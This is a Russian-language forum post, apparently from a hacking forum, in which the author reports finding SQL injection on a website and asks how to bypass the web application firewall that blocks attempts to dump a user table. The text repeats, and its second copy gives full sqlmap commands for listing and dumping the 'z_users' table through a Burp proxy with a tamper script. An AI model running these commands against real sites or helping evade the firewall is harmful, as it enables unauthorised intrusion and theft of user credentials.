Привет еврибади!
Окунь нашел sqli, через sqlmap удалось получить таблички из БД (тут waf молчит):
Среди прочих имеются таблицы с именем rsfirewall:
При попытке дампа таблицы waf стал блочить запросы и кидаться 403.
Перебрал --tamper, результат - 0.
Через burp видно, что работает waf.
Подскажите, как обойти waf?
Окунь нашел sqli, через sqlmap удалось получить таблички из БД (тут waf молчит):
sqlmap -u "http://bla-bla-bla.com/galer/*/ansa-1-1" --random-agent --level=5 --risk=3 --ignore-code 500 -D database -T z_users --columnСреди прочих имеются таблицы с именем rsfirewall:
z_rsfirewall_configurationПри попытке дампа таблицы waf стал блочить запросы и кидаться 403.
Перебрал --tamper, результат - 0.
sqlmap -u "http://bla-bla-bla.com/galer/*/ansa-1-1" --random-agent --level=5 --risk=3 --ignore-code 500 -D database -T z_users --dump --proxy=http://localhost:8080 --batch --tamper=overlongutf8.pyЧерез burp видно, что работает waf.
Подскажите, как обойти waf?